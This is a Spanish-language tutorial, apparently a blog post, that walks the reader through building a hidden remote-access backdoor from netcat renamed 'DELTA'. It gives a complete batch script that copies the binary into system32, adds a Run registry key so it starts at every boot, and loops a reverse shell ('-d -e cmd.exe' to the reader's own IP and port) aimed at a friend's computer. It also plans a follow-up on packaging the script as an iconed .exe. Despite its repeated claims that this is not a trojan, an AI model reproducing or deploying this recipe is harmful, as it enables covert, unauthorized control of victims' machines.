EN DIFINITIVA EN NETCAT ES: Pues bien, ahora, creo yo que ya puedes comenzar con el proyecto, empezarás a "programar" tu archivo bat o batch, mejor llamémoslo batch, bat es la extensión y todas las extensiones acostumbran a escribirse con un punto delante, es decir: .bat, .jpg, .mp3, 


etc... ¿No sabes qué es un archivo batch?, bueno, no hay problema, ya sabes dónde tienes que clicar para saberlo. No te asustes, no tienes que saber ningún comando, simplemente tienes que saber qué es un archivo batch. Vale, ya está, ahora supongo que ya lo sabes, y si ya lo sabías, pues muy bien, sigamos... el NETCAT, como ya sabes, es un programa que nos permite controlar remotamente un PC, ordenador, computadora o como quieras llamarle. Consta de dos partes, bueno... tres partes, aunque en este caso la tercera no la incluye, por eso la vas a crear tú. Debes saber que este programa está considerado un troyano por muchos antivirus, sin embargo no lo es, por menos no ha sido programado con un fin delictivo. ¿En qué iba?... ¡ah sí!, las partes, pues bien, 


normalmente podemos dividir un troyano en tres partes importantes, que funcionan más o menos igual que en NETCAT, la diferencia es que NETCAT no es un troyano, es un programa de control remoto. Las tres partes son el client (cliente) el server (servidor) y el config server (configurador del servidor), ahora te las explico una a una.- Client (cliente) El client, o cliente, en español, (yo le llamaré cliente) es la parte del programa que deberá estar en tu host, es decir, en tu ordenador, es la parte del programa que utilizarás para controlar remotamente el host remoto, es decir, el ordenador remoto. - Server (servidor) Bueno, ¿sabes qué es un servidor?,
 


¡ok!, pues esta es la parte del programa que deberá estar en el host remoto. ¿Por qué debe estar ahí?, ¡preguntas mucho eh!, pues deberías haber leído esta línea en Wikipedia "Una aplicación informática o programa que realiza algunas tareas en beneficio de otras aplicaciones llamadas clientes", en fin, básicamente quédate con esa idea. - Config server (configurador del servidor) Y bueno, el título lo dice todo, creo yo, esta es la parte del programa, o mejor dicho, aplicación, que de hecho decirle programa al NETCAT es un error, ya que el NETCAT es una aplicación formada por un conjunto de programas que son estos tres en cuestión de los cuales te estoy hablando, pero bueno...
 

pues esta es la parte de la aplicación que se encargará de configurar el servidor, en tu caso, la crearás tú, bueno, de hecho lo que harás será crear un archivo por lotes (o batch) con toda la configuración, así que no necesitarás ningún programa de tipo config server, además, el NETCAT no incluye ninguno ya que no es un troyano, ¿verdad?  


¿Entonces voy a crear un troyano?, ¡no!, ¡no vas a crear un troyano!, lo que vas a hacer es crear un archivo batch con tu configuración, de modo que puedas realizar la conexión al ordenador remoto de manera automática, además de otras ventajas que tiene, que ya te contaré más adelante. Peculiaridad de NETCAT A ver, como he dicho antes, si es que me he expresado bien, el NETCAT es una aplicación formada por 2 programas, el cliente y el servidor, el cliente y el servidor están unidos en un sólo archivo ejecutable, a diferencia de los troyanos (en general), que están formados por 3 programas independientes, es decir, que son 3 archivos ejecutables. Pero el NETCAT no es un troyano amigo mío, así que tanto el cliente como el servidor están unidos en un solo archivo ejecutable, de modo que el archivo que esté en el host remoto será el mismo que estará en tu host. Iniciando el proyecto programando nuestro archivo batch, ahora en serio Bueno, ahora sí que comenzarás a programar tu archivo batch con la configuración necesaria para que el NETCAT, que por cierto, ahora ya no le voy a llamar NETCAT, sino DELTA, sí, me gusta más ese nombre.
 


¿Qué programa necesito, Visual Basic, Java...?, no, el bloc de notas, ¿qué?, no preguntes más, tú abre el bloc de notas, ahí programarás tu archivo batch. ¿Ya?, bien, comencemos. Lo primero que vas a hacer es copiar este código en el bloc de notas: copy *.exe c:windowssystem32 copy *.exe c:windowssystem32 reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v * /t REG_SZ /d "c:windowssystem32*.exe" /f :bucle * -d -e cmd.exe *.*.*.* * goto bucle No te preocupes si no entiendes nada, ahora te explico qué significa cada línea por cierto, la línea 4 y la 6 como si no existieran, de momento. 



Primeramente te diré que los asteriscos son lo que remplazarás por tu configuración, por ejemplo tu IP, el puerto (sólo quédate con las dos primeras líneas y ten en cuenta que estoy hablándote de software) por donde trabajará el DELTA, la ruta dónde se copiará, etc... Bien, ¿preparado?. La primera línea indica dónde se copiará el archivo que está marcado en azul (el asterisco * lo remplazarás por el nombre que tú le pondrás al servidor). La segunda línea es igual que la primera, pero en este caso el * es el nombre del archivo de configuración (que es este mismo, sí, todo lo que has copiado en el bloc de notas). La tercera línea tiene la función de agregar una información al registro que hará que el archivo de configuración arranque en cada inicio de Windows, 


lógicamente el * debe sustituirse por el mismo nombre que el de la línea 2. En la última línea del archivo de configuración, el primer * debe ser sustituido por el mismo nombre que el de la primera línea, es decir, el nombre del servidor, (los parámetros que hay en medio te los explicaré después), luego, los *.*.*.* los sustituirás por tu dirección IP, ahora te explicaré por qué la tuya y no la del host remoto. El último * debe sustituirse por el puerto, que también vas elegir tú. Entonces, ¿el archivo de configuración lo tendrá el equipo remoto?, sí, y lo que hará exactamente será darle las órdenes al DELTA (servidor), que también estará en su sistema, y éste se conectará a ti, por eso ahí debes introducir tu IP y un puerto, por lo tanto, debes asegurarte de que el puerto está libre y abierto en tu router. ¿Por qué no me conecto yo a él?, es mejor que el equipo remoto se conecte a ti, imagínate que quieres controlar el de tu amigo, si tu amigo no sabe abrir puertos en el router (tú sí, porque eres un hacker...),
 


lo que haces es un reverse shell, eso no está en Wikipedia, así que te lo voy a explicar yo resumidamente: Cuando quieres conectarte a un servidor, éste debe tener un puerto abierto en el router para que los datos que envíes y recibas de una aplicación determinada vayan por ahí, en cambio tú no debes tener ningún puerto abierto en tu router. Abrir un puerto puede ser complicado para alguien con niveles básicos de informática, así que lo que haces es configurar el DELTA para que te dé un reverse shell, es decir, que te ofrecerá la shell del host remoto, entonces, tú abres el puerto en tu router y en vez de conectarse el cliente al servidor, el servidor se conecta al cliente, de ese modo podrás controlar remotamente el sistema del host remoto sin la necesidad de que el usuario de éste tenga que abrir el puerto en su router. ¿Lo vas pillando?, por ese motivo introduces tu IP y tu puerto en el archivo de configuración que dará las órdenes al servidor, el servidor intentará conectarse a tu host (cliente), ¿cuando?,
 

pues intentará conectarse ilimitadamente gracias al los comandos :bucle y goto bucle del los cuales no hablé antes, su función es hacer repetir una acción ilimitadamente, la que se encuentra entre las líneas :bucle y goto bucle. Si tú (el cliente) no estás disponible, entonces el servidor irá intentando conectarse a ti hasta que tu cliente (DELTA) esté en escucha (disponible) en el puerto determinado, cuando lo esté, se conectará y dejará de intentarlo hasta que tú te desconectes, entonces de nuevo seguirá intentándolo y así consecutivamente. Bien, ahora te recomiendo que crees una carpeta con el nombre "delta". Ya puedes comenzar a configurar el archivo batch, primero dale un nombre al servidor, yo le he puesto "delta.exe" (el .exe ya está puesto, sólo cambia los asteriscos). copy delta.exe c:windowssystem32 Ahora ponle un nombre al archivo de configuración, yo por ejemplo le he puesto "configdelta.exe". copy configdelta.exe c:windowssystem32 Ahora, en la tercera línea, después del parámetro "/v" .




sustituyes el asterisco por el nombre de la clave que se añadirá al registro que arrancará el archivo de configuración, yo le he puesto "delta". Luego, en la ubicación, en la misma línea, pones el mismo nombre que le pusiste al archivo de configuración, en mi caso "configdelta.exe". reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun /v delta /t REG_SZ /d "c:windowssystem32configdelta.exe" /f En la quinta línea sustituyes el primer asterisco por el nombre que pusiste al servidor, pero sin el ".exe", en mi caso es "delta", luego tu IP pública (o WAN), (ya te explicaré en otro tutorial la diferencia entre la IP pública y la IP privada). Para saber tu IP pública dirígete aquí, después introduces un puerto, si puede ser, uno que esté por encima del 1000. delta -d -e cmd.exe xxx.xxx.xxx.xxx 4000 Bien, pues ya está, ya tienes tu archivo de configuración batch programado, ahora lo guardas en la carpeta "delta" que creaste, con el nombre que le hayas puesto al archivo de configuración, pero en vez de ponerle la extensión .exe le pones la extensión .bat, en mi caso es "configdelta.bat". Hasta aquí el primer capítulo, en el segundo capítulo te explicaré cómo convertir ese .bat (batch) en un .exe (ejecutable) para que puedas ponerle un icono y más cosas...